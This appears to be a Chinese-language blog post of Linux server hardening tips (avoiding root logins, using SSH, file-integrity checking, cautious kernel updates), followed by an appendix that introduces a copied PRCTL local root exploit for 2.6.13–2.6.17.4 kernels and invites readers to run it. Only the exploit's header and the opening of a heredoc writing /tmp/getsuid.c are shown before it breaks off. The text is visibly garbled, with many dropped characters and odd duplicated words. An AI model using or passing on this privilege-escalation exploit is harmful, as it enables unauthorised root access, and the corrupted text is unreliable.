东西,今天吧自己维护服务器
些心得体会和大家分享下
写有些乱
如果有
话请大家指出太晚了睡觉去了1
日常维护上应该注意问题服务器安置好了并不代表万事大吉了
这只是个新开始只要服务器接入了网络每天都会遇到各种各样挑战如果日常维护上漫不经心样会毁了你服务器没有必要
时候不要使用root登录就算你是root也不要炫耀原因就不用说了为root设置个复杂密码日常维护可以用sudo分配给普通用户用普通用户完成尽量不要用su成root
如果必须要用话定要用/bin/su绝对路径运行可以防止自己不会运行个记录root帐号木马远程登陆
时候尽量不要在陌生计算机上用root登录服务器很可能这个计算机上软件Software是个精心设计木马用像SSH这样加密传输
进行远程维护不要用些明文传输软件Software如telnet如果存在嗅探器话你密码就完了日志分析也是
个经常需要做事情提早发现问题尽快解决总比亡羊补牢要好多2
严防linux病毒木马其实linux中
黑客和木马并不少如果大家到国外黑客网站WebSite看看就会发现每天都会有人发布些针对linux漏洞进行攻击脚本或源代码数量不比windows中少多少但大都只提供很少
信息真正会用人不多但是对于个经验丰富黑客根本不算什么他们般是先得到个权限不高shell再想办法在本地提升权限所以千万不要给他们这样机会最危险是远程溢出这个般是利用些漏洞所以要及时补上还有不需要远程登录功能尽量关闭如mysql如果不幸root已经被攻破了
般他们都会装些后门如果用tripwire曾经用生成过文件指纹数据库话就可以效验系统文件是否被替换了tripwire软件Software现在商业气息很浓可以用
egrit代替或自己编写个脚本实现最厉害还是内核级后门用tripwire查不出来没有什么好思路方法只能屏经验了般被入侵后ps、netstat这些命令都不可靠了可以把以前备份正常命令复制回来再用或用个最简单思路方法查找用nmap搜下本机端口后门般都会开个端口用于远程连接至于病毒不用太担心
由于linux主机相对来说还很少也很分散对病毒传播不利特别是蠕虫3
有关软件Software版本选择linux中
软件Software很多都是开源般分两种情况有些更新迅速都是些热门都软件Software还有些迟迟没有更新很有可能是作者准备放弃了对于服务器来讲千万不要出了新版就马上更新
虽然新版本在功能上和速度上会有提升但新软件Software都有些新加入代码这些代码安全性要经过段时间才能确定下来所以等稳定后再更新也不晚但也有例外比如2.6.17系列内核就曾发现过很多漏洞但新2.6.18系列还没发现严重漏洞所以更新成2.6.18就是个不错选择迟迟没有更新
软件Software如果这个软件Software很重要话不要急着换可以等等般如果个软件Software很有创意和影响话就算作者不再更新了不久就会有个新开发小组接替他工作【附录】
下面举
个木马例子看看黑客是如何提升权限附上个在国外网站WebSite复制来个源代码用于本地溢出使普通用户提升为管理员如果你内核是2.6.13<= x <=2.6.17.4或2.6.9-22.ELsmp在普通用户下可以试试这个脚本是很简单
大家可以建个文件把下面代码输进去加上运行权限运行就行了脚本会建立两个c
代码文件默认用cc编译大家也可以改成gcc运行后
用id命令看下发现已经有root权限了#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested _disibledevent=>[email protected]
cat > /tmp/getsuid.c << __EOF__
#
<std
最新评论